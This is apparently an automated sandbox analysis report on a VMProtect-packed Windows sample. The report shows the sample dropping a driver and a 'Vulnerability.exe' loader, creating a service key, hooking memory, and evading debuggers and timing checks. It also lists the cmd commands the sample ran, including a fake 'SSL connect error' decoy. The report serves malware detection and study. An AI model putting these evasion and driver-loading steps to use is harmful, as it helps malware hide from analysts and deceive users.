Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: lUAc7lqa56.exe Static PE information: section name: _RDATA
Source: lUAc7lqa56.exe Static PE information: section name: .vmp0
Source: lUAc7lqa56.exe Static PE information: section name: .vmp1

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe
Source: C:\Windows\Vulnerability.exe File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb
Source: C:\Windows\Vulnerability.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nULoYBmSWb

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2238000D value: E9 BB CB EB FF
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2223CBC0 value: E9 5A 34 14 00
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7909B8B5C second address: 7FF7909B8B85 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7908F5097 second address: 7FF7908F50CA instructions: 0x00000000 rdtsc 0x00000002 neg eax 0x00000004 inc ecx 0x00000005 not ch 0x00000007 inc ecx 0x00000008 pop edi 0x00000009 inc ecx 0x0000000a and ch, FFFFFFEEh 0x0000000d inc ecx 0x0000000e pop esi 0x0000000f rcl ebp, cl 0x00000011 inc ecx 0x00000012 pop ebp 0x00000013 dec eax 0x00000014 add ebx, esp 0x00000016 mov cx, di 0x00000019 pop ecx 0x0000001a inc ecx 0x0000001b pop edx 0x0000001c stc 0x0000001d inc cx 0x0000001f sar ecx, FFFFFFA2h 0x00000022 popfd 0x00000023 lahf 0x00000024 mov dl, D2h 0x00000026 pop ebp 0x00000027 inc ecx 0x00000028 pop ebx 0x00000029 cwd 0x0000002b inc ebp 0x0000002c xchg ah, al 0x0000002e cbw 0x00000030 pop esi 0x00000031 inc ecx 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF79039C244 second address: 7FF79039C26D instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF790348D7E second address: 7FF790348DA1 instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 xor dl, dl 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 pop ebp 0x00000008 mov di, 74EBh 0x0000000c popfd 0x0000000d inc ecx 0x0000000e mov dl, 73h 0x00000010 inc ecx 0x00000011 pop edi 0x00000012 dec eax 0x00000013 cmovs eax, ebp 0x00000016 inc ecx 0x00000017 pop ecx 0x00000018 inc cx 0x0000001a bswap eax 0x0000001c inc ecx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f dec ecx 0x00000020 movzx esi, si 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7903F0928 second address: 7FF7903F0946 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 bsr ecx, esi 0x00000006 inc ecx 0x00000007 pop ecx 0x00000008 popfd 0x00000009 cwde 0x0000000a cbw 0x0000000c movzx ebp, dx 0x0000000f pop edi 0x00000010 dec esp 0x00000011 movzx ebx, dx 0x00000014 cwde 0x00000015 inc ecx 0x00000016 xchg eax, ebx 0x00000017 pop ecx 0x00000018 cwde 0x00000019 inc ebp 0x0000001a xchg al, dh 0x0000001c inc ecx 0x0000001d pop esp 0x0000001e rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Special instruction interceptor: First address: 7FF79089AE37 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Special instruction interceptor: First address: 7FF79089AE4F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Dropped PE file which has not been started: C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys
Source: C:\Windows\Vulnerability.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nULoYBmSWb
Source: C:\Windows\System32\timeout.exe TID: 4856 Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 4_2_00007FF7CC423B60
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\lUAc7lqa56.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\lUAc7lqa56.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Handle closed: DEADC0DE
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process queried: DebugObjectHandle
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC421630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4243B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF7CC4243B8
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424D00 SetUnhandledExceptionFilter, 4_2_00007FF7CC424D00

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\lUAc7lqa56.exe NtProtectVirtualMemory: Indirect: 0x7FF79041E09E
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Windows\Vulnerability.exe Code function: GetLocaleInfoEx,FormatMessageA, 4_2_00007FF7CC4238A8
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00007FF7CC424D6C